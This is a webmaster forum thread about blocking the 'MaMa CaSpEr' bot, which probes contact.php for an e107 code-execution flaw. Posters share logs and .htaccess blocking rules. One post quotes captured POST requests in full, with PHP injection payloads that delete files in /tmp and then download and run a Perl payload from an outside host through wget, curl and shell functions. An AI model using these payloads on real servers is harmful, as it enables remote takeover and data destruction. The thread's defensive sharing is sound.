Not really feasible to post here, Bill. 260 lines, some of which are very long (total over 30 Kbytes), much of it BASE64 and a lot of tightly-packed URLs. It'd be a nightmare to disentangle. I'm willing to email it to known members if they sticky me, though.

I don't have .PHP in use.

My log processing program separates unknown bots from known bots who I haven't banned (such as google, yahoo, picsearch, etc)

and from legitimate traffic based on characteristics.

From this I found several recent .PHP hack attacks from all over.

Inspired by various posters I've since created the directories the hack attacks tried to find (various creative variations on php progs and others)

then took large meaningless files and renamed them main.php.

While I've banned the original ranges they came from,
if they repeat from another server, they'll get a mouthful of fur to choke on.

to quote a current movie,
off with their heads, screamed the red queen!

Why waste your bandwidth on those idiots? Simply 301 redirect to 127.0.0.1

I return a 403 for any page request that includes the extension (amongst others) .php. There is no way I would give them the folders/files they ask for: I would be creating them at the rate of dozens per day! And to no purpose except to encourage them.

I doubt they actually read the files anyway: they are just POSTing to them. Anyone noticed if they abort the read (206, was it?)? I haven't really checked the site logs, only the security logs which don't record that.

Finally saw one of the variations on a no-php server. Undeterred by 403s: 8 hits in 2 secs. Alternated attempted POSTs to one specific HTML page (but it removed the suffix & appended a nonexistent dir: /e107) with hits to the also nonexistent: /e107

ns*.eforienett.ro
kmccrew Bot Search

robots.txt? NO

FWIW: The only servers that make a beeline only to the same specific page are Tor.

I've been seeing this today as well

Here are some of the posts - url decoded

POST /rentals/propertydetail.aspx?PropertyName=contact HTTP/1.1
Connection: TE, close
Content-Length: 468
Content-Type: text/xml
Host: REMOVED
TE: deflate,gzip;q=0.3
User-Agent: MaMa CaSpEr
X-REWRITE-URL: /property//contact.php

<?xml version="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo'casper';echo`cd /var/tmp;cd /tmp;rm -fr *;wget [allsib.info...] -O bsd.xp;lwp-download [allsib.info...] -O bsd.xp;curl -O [allsib.info...] -O bsd.xp;perl bsd.xp`;echo'kae';exit;/*</name></value></param></params></methodCall>

POST /rentals/propertydetail.aspx?PropertyName=contact HTTP/1.1
Connection: TE, close
Content-Length: 97
Content-Type: application/x-www-form-urlencoded
Host: REMOVED
TE: deflate,gzip;q=0.3
User-Agent: MaMa CaSpEr
X-REWRITE-URL: /property//contact.php

send-contactus=1
&author_name=[php]echo('casper'.php_uname().'kae');die();[/php]

POST /rentals/propertydetail.aspx?PropertyName=contact HTTP/1.1
Connection: TE, close
Content-Length: 1241
Content-Type: application/x-www-form-urlencoded
Host: REMOVED
TE: deflate,gzip;q=0.3
User-Agent: MaMa CaSpEr
X-REWRITE-URL: /property//contact.php

send-contactus=1
&author_name=[php]passthru('cd /var/tmp;cd /tmp;rm -fr *;wget [allsib.info...] -O bsd.xp;lwp-download [allsib.info...] -O bsd.xp;curl -O [allsib.info...] -O bsd.xp;perl bsd.xp');exec('cd /var/tmp;cd /tmp;rm -fr *;wget [allsib.info...] -O bsd.xp;lwp-download [allsib.info...] -O bsd.xp;curl -O [allsib.info...] -O bsd.xp;perl bsd.xp');system('cd /var/tmp;cd /tmp;rm -fr *;wget [allsib.info...] -O bsd.xp;lwp-download [allsib.info...] -O bsd.xp;curl -O [allsib.info...] -O bsd.xp;perl bsd.xp');shell_exec('cd /var/tmp;cd /tmp;rm -fr *;wget [allsib.info...] -O bsd.xp;lwp-download [allsib.info...] -O bsd.xp;curl -O [allsib.info...] -O bsd.xp;perl bsd.xp');;die();[/php]

I am seeing lots of MaMa CaSpEr user agent attacks, ongoing for over two weeks now. Fortunately, I block POST attempts that they are trying to exploit. Ex:

POST /blogs//contact.php HTTP/1.1" 403 512 "-" "MaMa CaSpEr"

Apparently, the bot can't tell that I use Perl, not PHP for my blog.

These attacks are associated with Indonesian hackers using the e107 ByroeNet scanner. The Casper user agents are hard coded into the "ByroeNet" scanner dated from June 17, 2010.

I found much of this information on multiple searches, but it is best detailed here: [doc.emergingthreats.net...] - as captured in their honeypots and logs.

Bill; I hope that link is acceptable. It is an authority site.

Well, it still continues:

We maintain our own internal security (as well as access) logs (so that no one could easily exploit the standard ones).

In the last few hours, we've recorded dozens of hits from:

IP UA
77.79.246.81 Casper Bot Search

HTH

The Casper bot has just changed its name today, to CyBer.

91.213.117.193 - - [15/Sep/2010:05:36:08 -0600] "POST //contact.php HTTP/1.1" 403 550 "-" "MaMa CyBer"

The attacking IP is a an unconfigured server owned by a web hosting company in the Ukraine.

My .htaccess solution, from the get-go, has been:

RewriteCond %{HTTP_USER_AGENT} ^MaMa\ .+$ [NC]
RewriteRule .* - [F]

Allow the path to your custom 403 document, if any, in the RewriteRule, as a replacement for .*

Example:

RewriteRule !^(403\.(s?html|php)$ - [F]

I've seen nothing of this for the last 10 days.
Then, today:

80.72.93.nnn - - [25/Sep/2010:04:44:09 -0400] "POST /contact.php HTTP/1.1" 404 3466 "-" "MaMa CaSpEr"
80.72.93.190 - - [25/Sep/2010:04:44:09 -0400] "POST /W3DHJ/contact.php HTTP/1.1" 404 1968 "-" "MaMa CaSpEr"
80.72.93.nnn - - [25/Sep/2010:04:44:09 -0400] "POST /W3DHJ/b3016_preamp.html/contact.php HTTP/1.1" 404 1968 "-" "MaMa CaSpEr"
80.72.93.190 - - [25/Sep/2010:04:44:10 -0400] "POST /contact.php HTTP/1.1" 404 3466 "-" "MaMa CaSpEr"
80.72.93.nnn - - [25/Sep/2010:04:44:10 -0400] "POST /W3DHJ/contact.php HTTP/1.1" 404 1968 "-" "MaMa CaSpEr"
80.72.93.nnn - - [25/Sep/2010:04:44:10 -0400] "POST /W3DHJ/b3016_preamp.html%20%20/contact.php HTTP/1.1" 404 1968 "-" "MaMa CaSpEr"

The "nnn' were all the same: CXC

Jonesy